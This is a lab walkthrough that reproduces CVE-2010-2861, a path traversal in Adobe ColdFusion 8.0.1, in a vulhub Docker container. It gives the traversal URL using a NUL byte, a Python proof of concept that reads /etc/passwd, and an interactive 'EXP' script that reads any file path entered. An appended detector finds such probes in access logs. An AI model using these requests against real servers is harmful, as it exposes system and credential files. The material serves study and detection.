Using vulhub, enter the corresponding directory and start the Adobe ColdFusion 8.0.1 server:
[root@localhost ~]# cd /home/vulhub-master/coldfusion/CVE-2010-2861/
[root@localhost CVE-2010-2861]# docker-compose up -d
Check the port:
[root@localhost ~]# docker ps
CONTAINER ID   IMAGE                     COMMAND                  CREATED        STATUS        PORTS                                       NAMES
781868f36616   vulhub/coldfusion:8.0.1   "bash -c '/opt/coldf…"   24 hours ago   Up 24 hours   0.0.0.0:8500->8500/tcp, :::8500->8500/tcp   cve-2010-2861_coldfusion_1
The environment may take 1 to 5 minutes to start. Once it is up, visit http://your-ip:8500/CFIDE/administrator/enter.cfm to reach the initialization page; enter the password admin to initialize the whole environment.
Vulnerability reproduction:
Directly request http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en and inspect the response in Burp Suite; the file /etc/passwd is read back. The traversal path in the locale parameter escapes the web root and the trailing %00 (NUL byte) truncates the "en" locale suffix that the application appends:
import requests

url = "http://192.168.33.170:8500/"  # target base URL
poc = "CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en"  # read /etc/passwd
res = requests.get(url + poc)  # send the request
# Decide using the "/bin/bash" marker in the body together with a 200 response
if "/bin/bash" in res.text and res.status_code == 200:
    print("CVE-2010-2861 present")
PyCharm run output:
EXP:
import re
import requests

url = "http://192.168.33.170:8500/"  # target base URL
poc = "CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en"  # read /etc/passwd
res = requests.get(url + poc)  # send the request
# Decide using the "/bin/bash" marker in the body together with a 200 response
if "/bin/bash" in res.text and res.status_code == 200:
    print("CVE-2010-2861 present")
    while True:  # EXP loop
        path = input("Enter the file you want to read: ")
        # Replace /etc/passwd in the confirmed request with the entered path
        exp_res = requests.get(res.url.replace("/etc/passwd", path))
        print(re.findall(r"([\s\S]*?) ", exp_res.text))  # print the regex matches
PyCharm run output:
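For the defending side, the request shape shown above (enter.cfm, a locale value built from ../ segments, and a %00 NUL byte) is easy to pick out of web-server access logs. The following detector is an added example, not part of the original write-up; the log lines are constructed, and it decodes the query twice so that %2f and %2500 variants are also caught.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in Combined Log Format (not taken from the page).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:12:00:01 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 5120
10.0.0.9 - - [10/Oct/2023:12:00:02 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en HTTP/1.1" 200 7342
10.0.0.9 - - [10/Oct/2023:12:00:03 +0000] "GET /CFIDE/administrator/enter.cfm?locale=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow%2500en HTTP/1.1" 200 210
10.0.0.7 - - [10/Oct/2023:12:00:04 +0000] "GET /index.cfm HTTP/1.1" 200 880
"""

# Minimal parser for the request line and status code of a Combined Log Format entry.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_cve_2010_2861_probe(target: str) -> bool:
    """True when a request target matches the traversal the page describes:
    the ColdFusion administrator enter.cfm page with a locale value that
    contains ../ segments and a NUL byte (the %00 that cuts off the 'en' suffix).
    The query is percent-decoded twice so double-encoded variants are caught."""
    path, _, query = target.partition("?")
    if not path.lower().endswith("/cfide/administrator/enter.cfm"):
        return False
    decoded = unquote(unquote(query))
    params = (p.partition("=") for p in decoded.split("&"))
    locale = next((v for k, _, v in params if k == "locale"), "")
    # Normalise backslashes so ..\ is treated like ../
    return "../" in locale.replace("\\", "/") and "\x00" in locale


def find_probes(log_text: str) -> list[tuple[str, str, str]]:
    """Return (client_ip, status, target) for every log line that looks like a probe."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_cve_2010_2861_probe(m["target"]):
            hits.append((m["ip"], m["status"], m["target"]))
    return hits


if __name__ == "__main__":
    for ip, status, target in find_probes(SAMPLE_LOG):
        print(f"{ip} {status} {target}")
```

A 200 status on a matching line means the server likely returned file contents, which is the case to triage first; a 404 or 500 still records the attempt.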